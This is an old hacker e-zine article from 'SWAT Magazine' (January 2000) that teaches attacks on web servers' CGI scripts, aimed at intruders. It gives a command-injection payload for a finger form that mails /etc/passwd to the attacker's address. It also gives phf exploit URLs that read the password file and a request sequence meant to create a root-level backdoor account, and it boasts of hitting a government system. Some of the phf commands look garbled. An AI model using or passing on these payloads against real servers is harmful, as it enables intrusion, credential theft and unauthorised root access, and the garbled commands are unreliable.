_________SWAT MAGAZINE ISSUE TWENTY FIVE JANUARY 2000 __________
  /         \___________________________________________/          \
 /	         Site Busting: CGI Exploits part II                 \
/                      by -=The Firestarter=-                        \
-----------------------------------------------------------------------

Oh well i guess it's time for me to share with you some more of my
CGI hacker knowledge, this month we will me concentraiting on the
Finger box. 

Ok just like the finger daemon that runs on port 79 of some *nix 
systems, it will return information on users of the system, the 
information in itself can be invaluble when it comes to an attack on
the system. Ok so if we fire up Netscape and head over to:
Http://ww.victim-server.org/cgi-bin/finger
and we get a simple page with a box and a submit button then we have
struck gold!
Ok if you simply enter a name like "fred" into the box then you will
probably get one or two entries back, giving you the usual sorts of
information from a normal Finger query. Ok once you've got a few e-mail
addresses from the query (make a note of them now!) it's time to 
attempt an attack to swipe the /etc/passwd file! enter:

emailfromserver@victim-server.org ; /bin/mail me@me.co.uk < etc/passwd

into the box and whack the submit button!
Obviously emailfromserver@victim-server.org is the e-mail address you
got from the server and me@me.co.uk is your e-mail address.

Now _if_ that works you will recieve the /etc/passwd file in your
e-mail box. Just a little note though, you will be very lucky if this
actually works, but just like the old phf expoit, it will never die!

Now speaking of the old phf expoit, if you do ever find a system with
that installed (yeah i know that they are very rare but i found an
Australian government system with it on the other day :)
then instead of passing:

http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

to steal the passwd file try passing these commands (in this order):

http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20swateam%20swateam%20100%20

http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20swateam%0

http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500

now telnet to it and hey presto user swateam has root privs!

Yeah basic i know, but it still works on a few select systems.

<Just to let you all know that i got the information on adding a root>
<         user via phf from: Reality Check Network issue 33          >